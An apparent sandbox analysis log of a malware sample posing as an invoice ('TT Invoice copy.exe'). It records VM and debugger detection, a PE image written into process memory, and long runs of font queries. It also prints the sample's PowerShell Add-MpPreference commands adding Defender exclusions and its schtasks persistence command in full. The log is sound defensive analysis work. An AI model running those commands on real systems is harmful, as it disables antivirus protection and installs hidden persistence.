                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 99000
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 98890
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 98781
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 98670
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 98562
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 98453
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 98343
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 98234
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 98125
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 98015
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 97906
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 97797
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 97687
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Thread delayed: delay time: 922337203685477
                        Source: pUAQmWA.exe, 00000009.00000002.1712648860.0000000000652000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}h
                        Source: pUAQmWA.exe, 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: vmware
                        Source: TT Invoice copy.exe, 00000008.00000002.2886767446.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
                        Source: pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001432000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'.
                        Source: TT Invoice copy.exe, 00000000.00000002.1679317215.0000000000B75000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD0
                        Source: pUAQmWA.exe, 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Process information queried: ProcessInformation

                        Anti Debugging

                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 8_2_010170B0 CheckRemoteDebuggerPresent,8_2_010170B0
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Process queried: DebugPort
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Process queried: DebugPort
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Process token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe"
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pUAQmWA.exe"
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe"
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pUAQmWA.exe"
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Memory written: C:\Users\user\Desktop\TT Invoice copy.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Memory written: C:\Users\user\AppData\Roaming\pUAQmWA.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe"
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pUAQmWA.exe"
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp"
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Process created: C:\Users\user\Desktop\TT Invoice copy.exe "C:\Users\user\Desktop\TT Invoice copy.exe"
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3E66.tmp"
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Process created: C:\Users\user\AppData\Roaming\pUAQmWA.exe "C:\Users\user\AppData\Roaming\pUAQmWA.exe"
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Users\user\Desktop\TT Invoice copy.exe VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
